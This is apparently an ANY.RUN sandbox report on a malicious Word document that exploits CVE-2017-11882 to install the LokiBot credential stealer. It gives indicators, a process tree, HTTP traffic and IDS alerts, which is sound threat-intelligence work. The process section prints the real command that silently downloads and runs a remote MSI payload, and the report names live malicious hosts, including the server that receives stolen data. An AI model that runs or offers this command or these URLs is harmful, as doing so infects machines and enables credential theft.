analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://amazonvietnampharma.com.vn/l/css/css.doc

Full analysis: https://app.any.run/tasks/7857c557-a3e3-4424-9cf4-2aac68ccfcbe
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: February 19, 2019, 11:32:09
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
CVE-2017-11882
exe-to-msi
loader
trojan
lokibot
Indicators:
MD5:

B8656D933E1B2913E492318164EE9D0A

SHA1:

F4E39168525AD2A5EE29D033C7202D107BE1BCCE

SHA256:

546AC2B3A405535E57BDB08485A6AF39C23A3D8BB347489EBEABD3837E32E037

SSDEEP:

3:N1KfWt05Ld2qUBAdn:CECLd2Z8n

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 3844)
    • Uses Microsoft Installer as loader

      • cmd.exe (PID: 2604)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 2236)
    • LOKIBOT was detected

      • MSIAF20.tmp (PID: 3076)
    • Detected artifacts of LokiBot

      • MSIAF20.tmp (PID: 3076)
    • Connects to CnC server

      • MSIAF20.tmp (PID: 3076)
    • Actions looks like stealing of personal data

      • MSIAF20.tmp (PID: 3076)
  • SUSPICIOUS

    • Application launched itself

      • WINWORD.EXE (PID: 128)
    • Unusual connect from Microsoft Office

      • WINWORD.EXE (PID: 128)
    • Drop ExeToMSI Application

      • msiexec.exe (PID: 2236)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 2236)
      • MSIAF20.tmp (PID: 3076)
    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 3844)
    • Starts Microsoft Office Application

      • WINWORD.EXE (PID: 128)
    • Loads DLL from Mozilla Firefox

      • MSIAF20.tmp (PID: 3076)
    • Creates files in the user directory

      • MSIAF20.tmp (PID: 3076)
  • INFO

    • Application launched itself

      • iexplore.exe (PID: 2720)
      • MSIAF20.tmp (PID: 2200)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 128)
      • iexplore.exe (PID: 3224)
      • iexplore.exe (PID: 2720)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 128)
      • WINWORD.EXE (PID: 2916)
    • Changes internet zones settings

      • iexplore.exe (PID: 2720)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3224)
    • Reads internet explorer settings

      • iexplore.exe (PID: 3224)
    • Application was crashed

      • EQNEDT32.EXE (PID: 3844)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 2236)
    • Application was dropped or rewritten from another process

      • MSIAF20.tmp (PID: 2200)
      • MSIAF20.tmp (PID: 3076)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 2236)
      • MSIAF20.tmp (PID: 2200)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
10
Malicious processes
4
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start iexplore.exe iexplore.exe winword.exe winword.exe no specs eqnedt32.exe cmd.exe no specs msiexec.exe no specs msiexec.exe msiaf20.tmp no specs #LOKIBOT msiaf20.tmp

Process information

PID
CMD
Path
Indicators
Parent process
2720"C:\Program Files\Internet Explorer\iexplore.exe" -nohomeC:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3224"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2720 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
128"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXE
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2916"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3844"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
2604cmd.exe & /C CD C: & msiexec.exe /i http://amazonvietnampharma.com.vn/l/css/baba.msi /quiet C:\Windows\system32\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3000msiexec.exe /i http://amazonvietnampharma.com.vn/l/css/baba.msi /quiet C:\Windows\system32\msiexec.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2236C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2200"C:\Windows\Installer\MSIAF20.tmp"C:\Windows\Installer\MSIAF20.tmpmsiexec.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3076"C:\Windows\Installer\MSIAF20.tmp"C:\Windows\Installer\MSIAF20.tmp
MSIAF20.tmp
User:
admin
Integrity Level:
MEDIUM
Total events
2 369
Read events
1 592
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
28
Text files
23
Unknown types
10

Dropped files

PID
Process
Filename
Type
2720iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\favicon[1].ico
MD5:
SHA256:
2720iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
128WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9B9A.tmp.cvr
MD5:
SHA256:
128WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{E6CA511A-38DB-491B-9D8C-5BDC3A6B8EA5}
MD5:
SHA256:
128WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{E9831D4B-DFC2-4086-8CBD-3AF3515B2E47}
MD5:
SHA256:
2720iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF2E9BC6D9571F1C85.TMP
MD5:
SHA256:
128WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSFbinary
MD5:AA8E7E2925ECA5DDB38BCF80D9D63555
SHA256:0976CB953E4CA5430A4EF77B4D2C5C99B556DCF7E0EE257BD15197A82268D59A
128WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:739BB4FA82034F0230E7B80E6B96AE2D
SHA256:27B0CE7FBF60B5CC9FFD4BF052803F24D5B0FC59FAD92F5BEEFFAF2D6997FD9C
128WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSDbinary
MD5:1C4CA62A87642288FAC0CF856873E62D
SHA256:8C75A09B93DB61BE18E4062D38519F653AB39D10F691D3818B90377338202E30
3224iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\OCDM6JB6\css[1].doctext
MD5:C450C7DFC7572C12D6F3A86126A37AC9
SHA256:166AD91951FBFCC8BADF51A48BA6E385D78975368B8061F202D05ECAFA9E971C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
9
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
128
WINWORD.EXE
OPTIONS
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/
VN
suspicious
128
WINWORD.EXE
GET
200
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/css.doc
VN
text
56.4 Kb
suspicious
3224
iexplore.exe
GET
200
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/css.doc
VN
text
56.4 Kb
suspicious
976
svchost.exe
OPTIONS
405
115.146.122.229:80
http://amazonvietnampharma.com.vn/
VN
html
225 b
suspicious
2236
msiexec.exe
GET
200
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/baba.msi
VN
executable
656 Kb
suspicious
3076
MSIAF20.tmp
POST
185.159.153.76:80
http://irubix.ir/wp-includes/layout/fre.php
IR
malicious
2720
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
3076
MSIAF20.tmp
POST
185.159.153.76:80
http://irubix.ir/wp-includes/layout/fre.php
IR
malicious
3076
MSIAF20.tmp
POST
200
185.159.153.76:80
http://irubix.ir/wp-includes/layout/fre.php
IR
binary
23 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2720
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
2236
msiexec.exe
115.146.122.229:80
amazonvietnampharma.com.vn
CMC Telecommunications Services Company
VN
suspicious
3076
MSIAF20.tmp
185.159.153.76:80
irubix.ir
Fanavari Serverpars Argham Gostar Company Ltd.
IR
malicious
128
WINWORD.EXE
115.146.122.229:80
amazonvietnampharma.com.vn
CMC Telecommunications Services Company
VN
suspicious
3224
iexplore.exe
115.146.122.229:80
amazonvietnampharma.com.vn
CMC Telecommunications Services Company
VN
suspicious
976
svchost.exe
115.146.122.229:80
amazonvietnampharma.com.vn
CMC Telecommunications Services Company
VN
suspicious

DNS requests

Domain
IP
Reputation
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
amazonvietnampharma.com.vn
  • 115.146.122.229
suspicious
irubix.ir
  • 185.159.153.76
malicious

Threats

PID
Process
Class
Message
2236
msiexec.exe
Potential Corporate Privacy Violation
SUSPICIOUS [PTsecurity] Executable application_x-msi Download
2236
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
2236
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable ExeToMSI Download
3076
MSIAF20.tmp
A Network Trojan was detected
ET TROJAN LokiBot User-Agent (Charon/Inferno)
3076
MSIAF20.tmp
A Network Trojan was detected
ET TROJAN LokiBot Checkin
3076
MSIAF20.tmp
A Network Trojan was detected
ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1
3076
MSIAF20.tmp
A Network Trojan was detected
ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2
3076
MSIAF20.tmp
A Network Trojan was detected
MALWARE [PTsecurity] Loki Bot Check-in M2
3076
MSIAF20.tmp
A Network Trojan was detected
ET TROJAN LokiBot User-Agent (Charon/Inferno)
3076
MSIAF20.tmp
A Network Trojan was detected
ET TROJAN LokiBot Checkin
4 ETPRO signatures available at the full report
No debug info